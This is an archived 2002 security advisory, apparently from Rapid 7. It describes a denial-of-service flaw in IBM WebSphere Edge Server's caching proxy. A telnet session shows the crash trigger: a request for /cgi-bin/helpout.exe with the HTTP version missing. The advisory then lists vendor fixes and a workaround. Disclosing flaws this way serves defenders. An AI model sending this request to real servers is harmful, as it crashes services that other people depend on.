Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Servers :: web5775.htm

IBM WebSphere Edge Server Caching Proxy Denial of Service



24th Oct 2002 [SBWID-5775]
COMMAND

	IBM WebSphere Edge Server Caching Proxy Denial of Service

SYSTEMS AFFECTED

	 IBM Web Traffic Express Caching Proxy Server v4.x (bundled

	 with IBM WebSphere Edge Server v2.0)

	 IBM Web Traffic Express Caching Proxy Server v3.6

	

PROBLEM

	In Rapid 7 Advisory [#R7-0007] http://www.rapid7.com/ :
	

	The Caching Proxy component of  IBM's  WebSphere  Edge  Server  v2.0  is
	vulnerable to a denial-of-service attack against one of the default  CGI
	programs. A malformed HTTP request for /cgi-bin/helpout.exe  will  cause
	ibmproxy.exe to crash and cease functioning.
	

	IBM now bundles Web Traffic Express  v4.0  with  WebSphere  Edge  Server
	v2.0. IBM Web Traffic Express v3.6 and earlier were separately  shipping
	products.
	

	 Detailed analysis

	

	The proxy server will crash when /cgi-bin/helpout.exe is the subject  of
	an HTTP request that does not include an HTTP version specifier  at  the
	end of the request line.
	

	If you include a version specifier (e.g. "HTTP/1.0"),  helpout.exe  will
	successfully serve up a blank page.
	

	      [~] $ telnet localhost 80

	      Trying 127.0.0.1...

	      Connected to proxy.victim.com.

	      Escape character is '^]'.

	      GET /cgi-bin/helpout.exe HTTP/1.0

	

	      HTTP/1.1 200 Document follows

	      Pragma: no-cache

	      Last-Modified: Fri, 18 Oct 2002 16:54:40 GMT

	      Content-Type: text/html

	      Accept-Ranges: bytes

	      Connection: close

	      Date: Fri, 18 Oct 2002 16:54:40 GMT

	      Server: IBM-PROXY-WTE/2.0

	

	      Connection closed by foreign host.

	

	If you send a request with no  version  specifier,  or  with  a  version
	specifier that does not include a forward slash  (e.g.  "HTTP"  or  ""),
	ibmproxy.exe will crash, closing all connections:
	

	      [~] $ telnet localhost 80

	      Trying 127.0.0.1...

	      Connected to proxy.victim.com.

	      Escape character is '^]'.

	      GET /cgi-bin/helpout.exe HTTP

	

	      Connection closed by foreign host.

	

	An exception dialog will be displayed on the server console, reading:
	

	      ibmproxy.exe - Application Error

	      The instruction at "0x002662ac" referenced memory at "0x00000000". The

	      memory could not be "read".

	

	The access violation occurs within the WHTTPD.DLL module.
	

	

	   Contact Information

	

	   Rapid 7 Security Advisories

	   Email:   advisory@rapid7.com

	   Web:     http://www.rapid7.com/

	   Phone:   +1 (212) 558-8700

	

SOLUTION

	IBM customers should  install  Caching  Proxy  efix  build  4.0.1.26  or
	higher. Efix builds can be downloaded from IBM's secure  FTP  site.  For
	more information on obtaining efix builds, contact IBM support with  the
	APAR number listed above.
	

	This fix has also been ported back to the Web Traffic Express v3.6  code
	base. Customers  running  v3.6  should  contact  IBM  support  for  more
	information on how to upgrade to a newer build.
	

	As a temporary workaround, you can move  the  file  /cgi-bin/helpout.exe
	to a non-executable directory until the fix has been applied.
	

	

	 Vendor status and information

	

	

	   http://www-3.ibm.com/software/webservers/edgeserver/index.html

	

	IBM was notified of this  issue  and  has  released  efix  build  number
	4.0.1.26 for Caching Proxy Server  v4.x,  which  fixes  this  issue  and
	other  security  issues  (see  Rapid  7  advisory   R7-0008   for   more
	information: http://www.rapid7.com/advisories/R7-0008.txt ).
	

	IBM is tracking this issue as APAR# IY35970.
	

	

	 Disclaimer and Copyright

	

	Rapid 7, Inc. is not responsible for the misuse of the information

	provided in our security advisories.  These advisories are a service

	to the professional security community.  There are NO WARRANTIES

	with regard to this information.  Any application or distribution of

	this information constitutes acceptance AS IS, at the user's own

	risk.  This information is subject to change without notice.

	

	This advisory Copyright (C) 2002 Rapid 7, Inc.  Permission is

	hereby granted to redistribute this advisory, providing that no

	changes are made and that the copyright notices and disclaimers

	remain intact.

	


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH